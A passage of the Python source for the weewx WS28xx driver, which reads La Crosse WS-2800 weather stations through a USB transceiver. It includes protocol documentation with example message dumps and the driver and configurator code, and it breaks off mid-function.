    00 20 = Hi Al Indoor Temp
    00 10 = Lo Al Indoor Temp
    00 08 = Hi Al Pressure
    00 04 = Lo Al Pressure
    00 02 = not used
    00 01 = not used

-------------------------------------------------------------------------------
14. History Message

start  hi-lo  chars  rem  name
0      hi     4           DevID
2      hi     2           Action
3      hi     2           Quality          (%)
4      hi     4           DeviceCS
6      hi     6           LatestAddress
9      hi     6           ThisAddress
12     hi     1           not used
12     lo     3           Gust             (m/s)
14     hi     1           WindDirection    (0-15, also GustDirection)
14     lo     3           WindSpeed        (m/s)
16     hi     3           RainCounterRaw   (total in period in 0.1 inch)
17     lo     2           HumidityOutdoor  (%)
18     lo     2           HumidityIndoor   (%)
19     lo     5           PressureRelative (hPa)
22     hi     3           TempOutdoor      (C)
23     lo     3           TempIndoor       (C)
25     hi     10          Time

29     lo     60   end

-------------------------------------------------------------------------------
15. Set Config Message

start  hi-lo  chars  rem  name
0      hi     4           DevID
2      hi     2           Action
3      hi     2           Quality
4      hi     1       1   _WindspeedFormat
4      lo     0,25    2   _RainFormat
4      lo     0,25    3   _PressureFormat
4      lo     0,25    4   _TemperatureFormat
4      lo     0,25    5   _ClockMode
5      hi     1           _WeatherThreshold
5      lo     1           _StormThreshold
6      hi     1           _LowBatFlags
6      lo     1       6   _LCDContrast
7      hi     4       7   _WindDirAlarmFlags (reverse group 1)
9      hi     4       8   _OtherAlarmFlags   (reverse group 1)
11     hi     10          _TempIndoorMinMax._Min._Value (reverse group 2)
                          _TempIndoorMinMax._Max._Value (reverse group 2)
16     hi     10          _TempOutdoorMinMax._Min._Value (reverse group 3)
                          _TempOutdoorMinMax._Max._Value (reverse group 3)
21     hi     2           _HumidityIndoorMinMax._Min._Value
22     hi     2           _HumidityIndoorMinMax._Max._Value
23     hi     2           _HumidityOutdoorMinMax._Min._Value
24     hi     2           _HumidityOutdoorMinMax._Max._Value
25     hi     1           not used
25     lo     7           _Rain24HMax._Max._Value (reverse bytes)
29     hi     2           _HistoryInterval
30     hi     1           not used
30     lo     5           _GustMax._Max._Value (reverse bytes)
33     hi     10          _PressureRelative_hPaMinMax._Min._Value (rev grp4)
                          _PressureRelative_inHgMinMax._Min._Value(rev grp4)
38     hi     10          _PressureRelative_hPaMinMax._Max._Value (rev grp5)
                          _PressureRelative_inHgMinMax._Max._Value(rev grp5)
43     hi     6       9   _ResetMinMaxFlags
46     hi     4       10  _InBufCS

47     lo     96          end

Remarks 
  1 0=m/s 1=knots 2=bft 3=km/h 4=mph
  2 0=mm   1=inch
  3 0=inHg 2=hPa
  4 0=F    1=C
  5 0=24h  1=12h
  6 values 0-7 => LCD contrast 1-8
  7 WindDir Alarms (not-reversed values in hex)
    80 00 = NNW
    40 00 = NW
    20 00 = WNW
    10 00 = W
    08 00 = WSW
    04 00 = SW
    02 00 = SSW
    01 00 = S
    00 80 = SSE
    00 40 = SE
    00 20 = ESE
    00 10 = E
    00 08 = ENE
    00 04 = NE
    00 02 = NNE
    00 01 = N
  8 Other Alarms (not-reversed values in hex)
    80 00 = Hi Al Gust
    40 00 = Al WindDir
    20 00 = One or more WindDirs set
    10 00 = Hi Al Rain24H
    08 00 = Hi Al Outdoor Humidity
    04 00 = Lo Al Outdoor Humidity
    02 00 = Hi Al Indoor Humidity
    01 00 = Lo Al Indoor Humidity
    00 80 = Hi Al Outdoor Temp
    00 40 = Lo Al Outdoor Temp
    00 20 = Hi Al Indoor Temp
    00 10 = Lo Al Indoor Temp
    00 08 = Hi Al Pressure
    00 04 = Lo Al Pressure
    00 02 = not used
    00 01 = not used
  9 ResetMinMaxFlags (not-reversed values in hex)
    "Output only; not included in checksum calc"
    80 00 00 =  Reset DewpointMax
    40 00 00 =  Reset DewpointMin
    20 00 00 =  not used
    10 00 00 =  Reset WindchillMin*
    "*Reset dateTime only; Min._Value is preserved"
    08 00 00 =  Reset TempOutMax
    04 00 00 =  Reset TempOutMin
    02 00 00 =  Reset TempInMax
    01 00 00 =  Reset TempInMin
    00 80 00 =  Reset Gust
    00 40 00 =  not used
    00 20 00 =  not used
    00 10 00 =  not used
    00 08 00 =  Reset HumOutMax
    00 04 00 =  Reset HumOutMin
    00 02 00 =  Reset HumInMax
    00 01 00 =  Reset HumInMin
    00 00 80 =  not used
    00 00 40 =  Reset Rain Total
    00 00 20 =  Reset last month?
    00 00 10 =  Reset lastweek?
    00 00 08 =  Reset Rain24H
    00 00 04 =  Reset Rain1H
    00 00 02 =  Reset PresRelMax
    00 00 01 =  Reset PresRelMin
  10 Checksum = sum bytes (0-42) + 7 

-------------------------------------------------------------------------------
16. Get Config Message

start  hi-lo  chars  rem  name
0      hi     4           DevID
2      hi     2           Action
3      hi     2           Quality
4      hi     1      1    _WindspeedFormat
4      lo     0,25   2    _RainFormat
4      lo     0,25   3    _PressureFormat
4      lo     0,25   4    _TemperatureFormat
4      lo     0,25   5    _ClockMode
5      hi     1           _WeatherThreshold
5      lo     1           _StormThreshold
6      hi     1           _LowBatFlags
6      lo     1      6    _LCDContrast
7      hi     4      7    _WindDirAlarmFlags
9      hi     4      8    _OtherAlarmFlags
11     hi     5           _TempIndoorMinMax._Min._Value
13     lo     5           _TempIndoorMinMax._Max._Value
16     hi     5           _TempOutdoorMinMax._Min._Value
18     lo     5           _TempOutdoorMinMax._Max._Value
21     hi     2           _HumidityIndoorMinMax._Max._Value
22     hi     2           _HumidityIndoorMinMax._Min._Value
23     hi     2           _HumidityOutdoorMinMax._Max._Value
24     hi     2           _HumidityOutdoorMinMax._Min._Value
25     hi     1           not used
25     lo     7           _Rain24HMax._Max._Value
29     hi     2           _HistoryInterval
30     hi     5           _GustMax._Max._Value
32     lo     1           not used
33     hi     5           _PressureRelative_hPaMinMax._Min._Value
35     lo     5           _PressureRelative_inHgMinMax._Min._Value
38     hi     5           _PressureRelative_hPaMinMax._Max._Value
40     lo     5           _PressureRelative_inHgMinMax._Max._Value
43     hi     6      9    _ResetMinMaxFlags
46     hi     4      10   _InBufCS

47     lo     96          end

Remarks
  1 0=m/s 1=knots 2=bft 3=km/h 4=mph
  2 0=mm   1=inch
  3 0=inHg 2=hPa
  4 0=F    1=C
  5 0=24h  1=12h
  6 values 0-7 => LCD contrast 1-8
  7 WindDir Alarms (values in hex)
    80 00 = NNW
    40 00 = NW
    20 00 = WNW
    10 00 = W
    08 00 = WSW
    04 00 = SW
    02 00 = SSW
    01 00 = S
    00 80 = SSE
    00 40 = SE
    00 20 = ESE
    00 10 = E
    00 08 = ENE
    00 04 = NE
    00 02 = NNE
    00 01 = N
  8 Other Alarms (values in hex)
    80 00 = Hi Al Gust
    40 00 = Al WindDir
    20 00 = One or more WindDirs set
    10 00 = Hi Al Rain24H
    08 00 = Hi Al Outdoor Humidity
    04 00 = Lo Al Outdoor Humidity
    02 00 = Hi Al Indoor Humidity
    01 00 = Lo Al Indoor Humidity
    00 80 = Hi Al Outdoor Temp
    00 40 = Lo Al Outdoor Temp
    00 20 = Hi Al Indoor Temp
    00 10 = Lo Al Indoor Temp
    00 08 = Hi Al Pressure
    00 04 = Lo Al Pressure
    00 02 = not used
    00 01 = not used
  9 ResetMinMaxFlags (values in hex)
    "Output only; input =  00 00 00"
  10 Checksum = sum bytes (0-42) + 7 


-------------------------------------------------------------------------------
Examples of messages

readCurrentWeather
Cur   000: 01 2e 60 5f 05 1b 00 00 12 01  30 62 21 54 41 30 62 40 75 36  
Cur   020: 59 00 60 70 06 35 00 01 30 62  31 61 21 30 62 30 55 95 92 00  
Cur   040: 53 10 05 37 00 01 30 62 01 90  81 30 62 40 90 66 38 00 49 00  
Cur   060: 05 37 00 01 30 62 21 53 01 30  62 22 31 75 51 11 50 40 05 13  
Cur   080: 80 13 06 22 21 40 13 06 23 19  37 67 52 59 13 06 23 06 09 13  
Cur   100: 06 23 16 19 91 65 86 00 00 00  00 00 00 00 00 00 00 00 00 00  
Cur   120: 00 00 00 00 00 00 00 00 00 13  06 23 09 59 00 06 19 00 00 51  
Cur   140: 13 06 22 20 43 00 01 54 00 00  00 01 30 62 21 51 00 00 38 70  
Cur   160: a7 cc 7b 50 09 01 01 00 00 00  00 00 00 fc 00 a7 cc 7b 14 13  
Cur   180: 06 23 14 06 0e a0 00 01 b0 00  13 06 23 06 34 03 00 91 01 92  
Cur   200: 03 00 91 01 92 02 97 41 00 74  03 00 91 01 92
 
WeatherState: Sunny(Good)  WeatherTendency: Rising(Up)  AlarmRingingFlags: 0000
TempIndoor      23.500 Min:20.700 2013-06-24 07:53 Max:25.900 2013-06-22 15:44
HumidityIndoor  59.000 Min:52.000 2013-06-23 19:37 Max:67.000 2013-06-22 21:40
TempOutdoor     13.700 Min:13.100 2013-06-23 05:59 Max:19.200 2013-06-23 16:12
HumidityOutdoor 86.000 Min:65.000 2013-06-23 16:19 Max:91.000 2013-06-23 06:09
Windchill       13.700 Min: 9.000 2013-06-24 09:06 Max:23.800 2013-06-20 19:08
Dewpoint        11.380 Min:10.400 2013-06-22 23:17 Max:15.111 2013-06-22 15:30
WindSpeed        2.520
Gust             4.320                             Max:37.440 2013-06-23 14:06
WindDirection    WSW    GustDirection    WSW
WindDirection1   SSE    GustDirection1   SSE
WindDirection2     W    GustDirection2     W
WindDirection3     W    GustDirection3     W
WindDirection4   SSE    GustDirection4   SSE
WindDirection5    SW    GustDirection5    SW
RainLastMonth    0.000                             Max: 0.000 1900-01-01 00:00
RainLastWeek     0.000                             Max: 0.000 1900-01-01 00:00
Rain24H          0.510                             Max: 6.190 2013-06-23 09:59
Rain1H           0.000                             Max: 1.540 2013-06-22 20:43
RainTotal        3.870                    LastRainReset       2013-06-22 15:10
PresRelhPa 1019.200 Min:1007.400 2013-06-23 06:34 Max:1019.200 2013-06-23 06:34
PresRel_inHg 30.090 Min:  29.740 2013-06-23 06:34 Max:  30.090 2013-06-23 06:34
Bytes with unknown meaning at 157-165: 50 09 01 01 00 00 00 00 00 

-------------------------------------------------------------------------------
readHistory
His   000: 01 2e 80 5f 05 1b 00 7b 32 00  7b 32 00 0c 70 0a 00 08 65 91  
His   020: 01 92 53 76 35 13 06 24 09 10 
 
Time           2013-06-24 09:10:00
TempIndoor=          23.5
HumidityIndoor=        59
TempOutdoor=         13.7
HumidityOutdoor=       86
PressureRelative=  1019.2
RainCounterRaw=       0.0
WindDirection=        SSE
WindSpeed=            1.0
Gust=                 1.2

-------------------------------------------------------------------------------
readConfig
In   000: 01 2e 40 5f 36 53 02 00 00 00  00 81 00 04 10 00 82 00 04 20  
In   020: 00 71 41 72 42 00 05 00 00 00  27 10 00 02 83 60 96 01 03 07  
In   040: 21 04 01 00 00 00 05 1b

-------------------------------------------------------------------------------
writeConfig
Out  000: 01 2e 40 64 36 53 02 00 00 00  00 00 10 04 00 81 00 20 04 00  
Out  020: 82 41 71 42 72 00 00 05 00 00  00 10 27 01 96 60 83 02 01 04  
Out  040: 21 07 03 10 00 00 05 1b 

OutBufCS=             051b
ClockMode=            0
TemperatureFormat=    1
PressureFormat=       1
RainFormat=           0
WindspeedFormat=      3
WeatherThreshold=     3
StormThreshold=       5
LCDContrast=          2
LowBatFlags=          0
WindDirAlarmFlags=    0000
OtherAlarmFlags=      0000
HistoryInterval=      0
TempIndoor_Min=       1.0
TempIndoor_Max=       41.0
TempOutdoor_Min=      2.0
TempOutdoor_Max=      42.0
HumidityIndoor_Min=   41
HumidityIndoor_Max=   71
HumidityOutdoor_Min=  42
HumidityOutdoor_Max=  72
Rain24HMax=           50.0
GustMax=              100.0
PressureRel_hPa_Min=  960.1
PressureRel_inHg_Min= 28.36
PressureRel_hPa_Max=  1040.1
PressureRel_inHg_Max= 30.72
ResetMinMaxFlags=     100000 (Output only; Input always 00 00 00)

-------------------------------------------------------------------------------
class EHistoryInterval:
Constant  Value Message received at
hi01Min   = 0   00:00, 00:01, 00:02, 00:03 ... 23:59
hi05Min   = 1   00:00, 00:05, 00:10, 00:15 ... 23:55
hi10Min   = 2   00:00, 00:10, 00:20, 00:30 ... 23:50
hi15Min   = 3   00:00, 00:15, 00:30, 00:45 ... 23:45
hi20Min   = 4   00:00, 00:20, 00:40, 01:00 ... 23:40
hi30Min   = 5   00:00, 00:30, 01:00, 01:30 ... 23:30
hi60Min   = 6   00:00, 01:00, 02:00, 03:00 ... 23:00
hi02Std   = 7   00:00, 02:00, 04:00, 06:00 ... 22:00
hi04Std   = 8   00:00, 04:00, 08:00, 12:00 ... 20:00
hi06Std   = 9   00:00, 06:00, 12:00, 18:00
hi08Std   = 0xA 00:00, 08:00, 16:00
hi12Std   = 0xB 00:00, 12:00
hi24Std   = 0xC 00:00

-------------------------------------------------------------------------------
WS SetTime - Send time to WS
Time  000: 01 2e c0 05 1b 19 14 12 40 62  30 01
time sent: 2013-06-24 12:14:19 

-------------------------------------------------------------------------------
ReadConfigFlash data

Ask for frequency correction 
rcfo  000: dd 0a 01 f5 cc cc cc cc cc cc  cc cc cc cc cc

readConfigFlash frequency correction
rcfi  000: dc 0a 01 f5 00 01 78 a0 01 02  0a 0c 0c 01 2e ff ff ff ff ff
frequency correction: 96416 (0x178a0)
adjusted frequency: 910574957 (3646456d)

Ask for transceiver data 
rcfo  000: dd 0a 01 f9 cc cc cc cc cc cc  cc cc cc cc cc

readConfigFlash serial number and DevID
rcfi  000: dc 0a 01 f9 01 02 0a 0c 0c 01  2e ff ff ff ff ff ff ff ff ff
transceiver ID: 302 (0x012e)
transceiver serial: 01021012120146

Program Logic

The RF communication thread uses the following logic to communicate with the
weather station console:

Step 1.  Perform in a while loop getState commands until state 0xde16
         is received.

Step 2.  Perform a getFrame command to read the message data.

Step 3.  Handle the contents of the message. The type of message depends on
         the response type:

  Response type (hex):
  20: WS SetTime / SetConfig - Data written
      confirmation the setTime/setConfig setFrame message has been received
      by the console
  40: GetConfig
      save the contents of the configuration for later use (i.e. a setConfig
      message with one ore more parameters changed)
  60: Current Weather
      handle the weather data of the current weather message
  80: Actual / Outstanding History
      ignore the data of the actual history record when there is no data gap;
      handle the data of a (one) requested history record (note: in step 4 we
      can decide to request another history record).
  a1: Request First-Time Config
      prepare a setFrame first time message
  a2: Request SetConfig
      prepare a setFrame setConfig message
  a3: Request SetTime
      prepare a setFrame setTime message

Step 4.  When  you  didn't receive the message in step 3 you asked for (see
         step 5 how to request a certain type of message), decide if you want
         to ignore or handle the received message. Then go to step 5 to
         request for a certain type of message unless the received message
         has response type a1, a2 or a3, then prepare first the setFrame
         message the wireless console asked for.

Step 5.  Decide what kind of message you want to receive next time. The
         request is done via a setFrame message (see step 6).  It is
         not guaranteed that you will receive that kind of message the next
         time but setting the proper timing parameters of firstSleep and
         nextSleep increase the chance you will get the requested type of
         message.

Step 6. The action parameter in the setFrame message sets the type of the
        next to receive message.

  Action (hex):
  00: rtGetHistory - Ask for History message
                     setSleep(0.300,0.010)
  01: rtSetTime    - Ask for Send Time to weather station message
                     setSleep(0.085,0.005)
  02: rtSetConfig  - Ask for Send Config to weather station message
                     setSleep(0.300,0.010)
  03: rtGetConfig  - Ask for Config message
                     setSleep(0.400,0.400)
  05: rtGetCurrent - Ask for Current Weather message
                     setSleep(0.300,0.010)
  c0: Send Time    - Send Time to WS
                     setSleep(0.085,0.005)
  40: Send Config  - Send Config to WS
                     setSleep(0.085,0.005)

  Note: after the Request First-Time Config message (response type = 0xa1)
        perform a rtGetConfig with setSleep(0.085,0.005)

Step 7. Perform a setTX command

Step 8. Go to step 1 to wait for state 0xde16 again.

"""

# TODO: how often is currdat.lst modified with/without hi-speed mode?
# TODO: thread locking around observation data
# TODO: eliminate polling, make MainThread get data as soon as RFThread updates
# TODO: get rid of Length/Buffer construct, replace with a Buffer class or obj

# FIXME: the history retrieval assumes a constant archive interval across all
#        history records.  this means anything that modifies the archive
#        interval should clear the history.

from datetime import datetime

import StringIO
import sys
import syslog
import threading
import time
import traceback
import usb

import weewx.drivers
import weewx.wxformulas
import weeutil.weeutil

DRIVER_NAME = 'WS28xx'
DRIVER_VERSION = '0.33'


def loader(config_dict, engine):
    return WS28xxDriver(**config_dict[DRIVER_NAME])

def configurator_loader(config_dict):
    return WS28xxConfigurator()

def confeditor_loader():
    return WS28xxConfEditor()


# flags for enabling/disabling debug verbosity
DEBUG_COMM = 0
DEBUG_CONFIG_DATA = 0
DEBUG_WEATHER_DATA = 0
DEBUG_HISTORY_DATA = 0
DEBUG_DUMP_FORMAT = 'auto'

def logmsg(dst, msg):
    syslog.syslog(dst, 'ws28xx: %s: %s' %
                  (threading.currentThread().getName(), msg))

def logdbg(msg):
    logmsg(syslog.LOG_DEBUG, msg)

def loginf(msg):
    logmsg(syslog.LOG_INFO, msg)

def logcrt(msg):
    logmsg(syslog.LOG_CRIT, msg)

def logerr(msg):
    logmsg(syslog.LOG_ERR, msg)

def log_traceback(dst=syslog.LOG_INFO, prefix='**** '):
    sfd = StringIO.StringIO()
    traceback.print_exc(file=sfd)
    sfd.seek(0)
    for line in sfd:
        logmsg(dst, prefix + line)
    del sfd

def log_frame(n, buf):
    logdbg('frame length is %d' % n)
    strbuf = ''
    for i in xrange(0,n):
        strbuf += str('%02x ' % buf[i])
        if (i + 1) % 16 == 0:
            logdbg(strbuf)
            strbuf = ''
    if strbuf:
        logdbg(strbuf)

def get_datum_diff(v, np, ofl):
    if abs(np - v) < 0.001 or abs(ofl - v) < 0.001:
        return None
    return v

def get_datum_match(v, np, ofl):
    if np == v or ofl == v:
        return None
    return v

def calc_checksum(buf, start, end=None):
    if end is None:
        end = len(buf[0]) - start
    cs = 0
    for i in xrange(0, end):
        cs += buf[0][i+start]
    return cs

def get_next_index(idx):
    return get_index(idx + 1)

def get_index(idx):
    if idx < 0:
        return idx + WS28xxDriver.max_records
    elif idx >= WS28xxDriver.max_records:
        return idx - WS28xxDriver.max_records
    return idx

def tstr_to_ts(tstr):
    try:
        return int(time.mktime(time.strptime(tstr, "%Y-%m-%d %H:%M:%S")))
    except (OverflowError, ValueError, TypeError):
        pass
    return None

def bytes_to_addr(a, b, c):
    return ((((a & 0xF) << 8) | b) << 8) | c

def addr_to_index(addr):
    return (addr - 416) / 18

def index_to_addr(idx):
    return 18 * idx + 416

def print_dict(data):
    for x in sorted(data.keys()):
        if x == 'dateTime':
            print '%s: %s' % (x, weeutil.weeutil.timestamp_to_string(data[x]))
        else:
            print '%s: %s' % (x, data[x])


class WS28xxConfEditor(weewx.drivers.AbstractConfEditor):
    @property
    def default_stanza(self):
        return """
[WS28xx]
    # This section is for the La Crosse WS-2800 series of weather stations.

    # Radio frequency to use between USB transceiver and console: US or EU
    # US uses 915 MHz, EU uses 868.3 MHz.  Default is US.
    transceiver_frequency = US

    # The station model, e.g., 'LaCrosse C86234' or 'TFA Primus'
    model = LaCrosse WS28xx

    # The driver to use:
    driver = weewx.drivers.ws28xx
"""

    def prompt_for_settings(self):
        print "Specify the frequency used between the station and the"
        print "transceiver, either 'US' (915 MHz) or 'EU' (868.3 MHz)."
        freq = self._prompt('frequency', 'US', ['US', 'EU'])
        return {'transceiver_frequency': freq}


class WS28xxConfigurator(weewx.drivers.AbstractConfigurator):
    def add_options(self, parser):
        super(WS28xxConfigurator, self).add_options(parser)
        parser.add_option("--check-transceiver", dest="check",
                          action="store_true",
                          help="check USB transceiver")
        parser.add_option("--pair", dest="pair", action="store_true",
                          help="pair the USB transceiver with station console")
        parser.add_option("--info", dest="info", action="store_true",
                          help="display weather station configuration")
        parser.add_option("--set-interval", dest="interval",
                          type=int, metavar="N",
                          help="set logging interval to N minutes")
        parser.add_option("--current", dest="current", action="store_true",
                          help="get the current weather conditions")
        parser.add_option("--history", dest="nrecords", type=int, metavar="N",
                          help="display N history records")
        parser.add_option("--history-since", dest="recmin",
                          type=int, metavar="N",
                          help="display history records since N minutes ago")
        parser.add_option("--maxtries", dest="maxtries", type=int,
                          help="maximum number of retries, 0 indicates no max")

    def do_options(self, options, parser, config_dict, prompt):
        maxtries = 3 if options.maxtries is None else int(options.maxtries)
        self.station = WS28xxDriver(**config_dict[DRIVER_NAME])
        if options.check:
            self.check_transceiver(maxtries)
        elif options.pair:
            self.pair(maxtries)
        elif options.interval is not None:
            self.set_interval(maxtries, options.interval, prompt)
        elif options.current:
            self.show_current(maxtries)
        elif options.nrecords is not None:
            self.show_history(maxtries, count=options.nrecords)
        elif options.recmin is not None:
            ts = int(time.time()) - options.recmin * 60
            self.show_history(maxtries, ts=ts)
        else:
            self.show_info(maxtries)
        self.station.closePort()

    def check_transceiver(self, maxtries):
        """See if the transceiver is installed and operational."""
        print 'Checking for transceiver...'
        ntries = 0
        while ntries < maxtries:
            ntries += 1
            if self.station.transceiver_is_present():
                print 'Transceiver is present'
                sn = self.station.get_transceiver_serial()
                print 'serial: %s' % sn
                tid = self.station.get_transceiver_id()
                print 'id: %d (0x%04x)' % (tid, tid)
                break
            print 'Not found (attempt %d of %d) ...' % (ntries, maxtries)
            time.sleep(5)
        else:
            print 'Transceiver not responding.'

    def pair(self, maxtries):
        """Pair the transceiver with the station console."""
        print 'Pairing transceiver with console...'
        maxwait = 90 # how long to wait between button presses, in seconds
        ntries = 0
        while ntries < maxtries or maxtries == 0:
            if self.station.transceiver_is_paired():
                print 'Transceiver is paired to console'
                break
            ntries += 1
            msg = 'Press and hold the [v] key until "PC" appears'
            if maxtries > 0:
                msg += ' (attempt %d of %d)' % (ntries, maxtries)
            else:
                msg += ' (attempt %d)' % ntries
            print msg
            now = start_ts = int(time.time())
            while (now - start_ts < maxwait and
                   not self.station.transceiver_is_paired()):
                time.sleep(5)
                now = int(time.time())
        else:
            print 'Transceiver not paired to console.'

    def get_interval(self, maxtries):
        cfg = self.get_config(maxtries)
        if cfg is None:
            return None
        return getHistoryInterval(cfg['history_interval'])

    def get_config(self, maxtries):
        start_ts = None
        ntries = 0
        while ntries < maxtries or maxtries == 0:
            cfg = self.station.get_config()
            if cfg is not None:
                return cfg
            ntries += 1
            if start_ts is None:
                start_ts = int(time.time())
            else:
                dur = int(time.time()) - start_ts
                print 'No data after %d seconds (press SET to sync)' % dur
            time.sleep(30)
        return None

    def set_interval(self, maxtries, interval, prompt):
        """Set the station archive interval"""
        print "This feature is not yet implemented"

    def show_info(self, maxtries):
        """Query the station then display the settings."""
        print 'Querying the station for the configuration...'
        cfg = self.get_config(maxtries)
        if cfg is not None:
            print_dict(cfg)

    def show_current(self, maxtries):
        """Get current weather observation."""
        print 'Querying the station for current weather data...'
        start_ts = None
        ntries = 0
        while ntries < maxtries or maxtries == 0:
            packet = self.station.get_observation()
            if packet is not None:
                print_dict(packet)
                break
            ntries += 1
            if start_ts is None:
                start_ts = int(time.time())
            else:
                dur = int(time.time()) - start_ts
                print 'No data after %d seconds (press SET to sync)' % dur
            time.sleep(30)

    def show_history(self, maxtries, ts=0, count=0):
        """Display the indicated number of records or the records since the 
        specified timestamp (local time, in seconds)"""
        print "Querying the station for historical records..."
        ntries = 0
        last_n = nrem = None
        last_ts = int(time.time())
        self.station.start_caching_history(since_ts=ts, num_rec=count)
        while nrem is None or nrem > 0:
            if ntries >= maxtries:
                print 'Giving up after %d tries' % ntries
                break
            time.sleep(30)
            ntries += 1
            now = int(time.time())
            n = self.station.get_num_history_scanned()
            if n == last_n:
                dur = now - last_ts
                print 'No data after %d seconds (press SET to sync)' % dur
            else:
                ntries = 0
                last_ts = now
            last_n = n
            nrem = self.station.get_uncached_history_count()
            ni = self.station.get_next_history_index()
            li = self.station.get_latest_history_index()
            msg = "  scanned %s records: current=%s latest=%s remaining=%s\r" % (n, ni, li, nrem)
            sys.stdout.write(msg)
            sys.stdout.flush()
        self.station.stop_caching_history()
        records = self.station.get_history_cache_records()
        self.station.clear_history_cache()
        print
        print 'Found %d records' % len(records)
        for r in records:
            print r


class WS28xxDriver(weewx.drivers.AbstractDevice):
    """Driver for LaCrosse WS28xx stations."""

    max_records = 1797

    def __init__(self, **stn_dict) :
        """Initialize the station object.

        model: Which station model is this?
        [Optional. Default is 'LaCrosse WS28xx']

        transceiver_frequency: Frequency for transceiver-to-console.  Specify
        either US or EU.
        [Required. Default is US]

        polling_interval: How often to sample the USB interface for data.
        [Optional. Default is 30 seconds]

        comm_interval: Communications mode interval
        [Optional.  Default is 3]

        device_id: The USB device ID for the transceiver.  If there are
        multiple devices with the same vendor and product IDs on the bus,
        each will have a unique device identifier.  Use this identifier
        to indicate which device should be used.
        [Optional. Default is None]

        serial: The transceiver serial number.  If there are multiple
        devices with the same vendor and product IDs on the bus, each will
        have a unique serial number.  Use the serial number to indicate which
        transceiver should be used.
        [Optional. Default is None]
        """

        self.model            = stn_dict.get('model', 'LaCrosse WS28xx')
        self.polling_interval = int(stn_dict.get('polling_interval', 30))
        self.comm_interval    = int(stn_dict.get('comm_interval', 3))
        self.frequency        = stn_dict.get('transceiver_frequency', 'US')
        self.device_id        = stn_dict.get('device_id', None)
        self.serial           = stn_dict.get('serial', None)

        self.vendor_id        = 0x6666
        self.product_id       = 0x5555

        now = int(time.time())
        self._service = None
        self._last_rain = None
        self._last_obs_ts = None
        self._last_nodata_log_ts = now
        self._nodata_interval = 300 # how often to check for no data
        self._last_contact_log_ts = now
        self._nocontact_interval = 300 # how often to check for no contact
        self._log_interval = 600 # how often to log

        global DEBUG_COMM
        DEBUG_COMM = int(stn_dict.get('debug_comm', 0))
        global DEBUG_CONFIG_DATA
        DEBUG_CONFIG_DATA = int(stn_dict.get('debug_config_data', 0))
        global DEBUG_WEATHER_DATA
        DEBUG_WEATHER_DATA = int(stn_dict.get('debug_weather_data', 0))
        global DEBUG_HISTORY_DATA
        DEBUG_HISTORY_DATA = int(stn_dict.get('debug_history_data', 0))
        global DEBUG_DUMP_FORMAT
        DEBUG_DUMP_FORMAT = stn_dict.get('debug_dump_format', 'auto')

        loginf('driver version is %s' % DRIVER_VERSION)
        loginf('frequency is %s' % self.frequency)

        self.startUp()

    @property
    def hardware_name(self):
        return self.model

    # this is invoked by StdEngine as it shuts down
    def closePort(self):
        self.shutDown()

    def genLoopPackets(self):
        """Generator function that continuously returns decoded packets."""
        while True:
            now = int(time.time()+0.5)
            packet = self.get_observation()
            if packet is not None:
                ts = packet['dateTime']
                if self._last_obs_ts is None or self._last_obs_ts != ts:
                    self._last_obs_ts = ts
                    self._last_nodata_log_ts = now
                    self._last_contact_log_ts = now
                else:
                    packet = None

            # if no new weather data, return an empty packet
            if packet is None:
                packet = {'usUnits': weewx.METRIC, 'dateTime': now}
                # if no new weather data for awhile, log it
                if self._last_obs_ts is None or \
                        now - self._last_obs_ts > self._nodata_interval:
                    if now - self._last_nodata_log_ts > self._log_interval:
                        msg = 'no new weather data'
                        if self._last_obs_ts is not None:
                            msg += ' after %d seconds' % (
                                now - self._last_obs_ts)
                        loginf(msg)
                        self._last_nodata_log_ts = now

            # if no contact with console for awhile, log it
            ts = self.get_last_contact()
            if ts is None or now - ts > self._nocontact_interval:
                if now - self._last_contact_log_ts > self._log_interval:
                    msg = 'no contact with console'
                    if ts is not None:
                        msg += ' after %d seconds' % (now - ts)
                    msg += ': press [SET] to sync'
                    loginf(msg)
                    self._last_contact_log_ts = now

            yield packet
            time.sleep(self.polling_interval)                    

    def genStartupRecords(self, ts):
        loginf('Scanning historical records')
        maxtries = 65
        ntries = 0
        last_n = n = nrem = None
        last_ts = now = int(time.time())
        self.start_caching_history(since_ts=ts)
        while nrem is None or nrem > 0:
            if ntries >= maxtries:
                logerr('No historical data after %d tries' % ntries)
                return
            time.sleep(60)
            ntries += 1
            now = int(time.time())
            n = self.get_num_history_scanned()
            if n == last_n:
                dur = now - last_ts
                loginf('No data after %d seconds (press SET to sync)' % dur)
            else:
                ntries = 0
                last_ts = now
            last_n = n
            nrem = self.get_uncached_history_count()
            ni = self.get_next_history_index()
            li = self.get_latest_history_index()
            loginf("Scanned %s records: current=%s latest=%s remaining=%s" %
                   (n, ni, li, nrem))
        self.stop_caching_history()
        records = self.get_history_cache_records()
        self.clear_history_cache()
        loginf('Found %d historical records' % len(records))
        last_ts = None
        for r in records:
            if last_ts is not None and r['dateTime'] is not None:
                r['usUnits'] = weewx.METRIC
                r['interval'] = (r['dateTime'] - last_ts) / 60
                yield r
            last_ts = r['dateTime']

# FIXME: do not implement hardware record generation until we figure
# out how to query the historical records faster.
#    def genArchiveRecords(self, since_ts):
#        pass

# FIXME: implement retries for this so that rf thread has time to get
# configuration data from the station
#    @property
#    def archive_interval(self):
#        cfg = self.get_config()
#        return getHistoryInterval(cfg['history_interval']) * 60

# FIXME: implement set/get time
#    def setTime(self):
#        pass
#    def getTime(self):
#        pass

    def startUp(self):
        if self._service is not None:
            return
        self._service = CCommunicationService()
        self._service.setup(self.frequency,
                            self.vendor_id, self.product_id, self.device_id,
                            self.serial, comm_interval=self.comm_interval)
        self._service.startRFThread()

    def shutDown(self):
        self._service.stopRFThread()
        self._service.teardown()
        self._service = None

    def transceiver_is_present(self):
        return self._service.DataStore.getTransceiverPresent()

    def transceiver_is_paired(self):
        return self._service.DataStore.getDeviceRegistered()

    def get_transceiver_serial(self):
        return self._service.DataStore.getTransceiverSerNo()

    def get_transceiver_id(self):
        return self._service.DataStore.getDeviceID()

    def get_last_contact(self):
        return self._service.getLastStat().last_seen_ts

    def get_observation(self):
        data = self._service.getWeatherData()
        ts = data._timestamp
        if ts is None:
            return None

        # add elements required for weewx LOOP packets
        packet = {}
        packet['usUnits'] = weewx.METRIC
        packet['dateTime'] = ts

        # data from the station sensors
        packet['inTemp']      = get_datum_diff(data._TempIndoor,
                                               CWeatherTraits.TemperatureNP(),
                                               CWeatherTraits.TemperatureOFL())
        packet['inHumidity']  = get_datum_diff(data._HumidityIndoor,
                                               CWeatherTraits.HumidityNP(),
                                               CWeatherTraits.HumidityOFL())
        packet['outTemp']     = get_datum_diff(data._TempOutdoor,
                                               CWeatherTraits.TemperatureNP(),
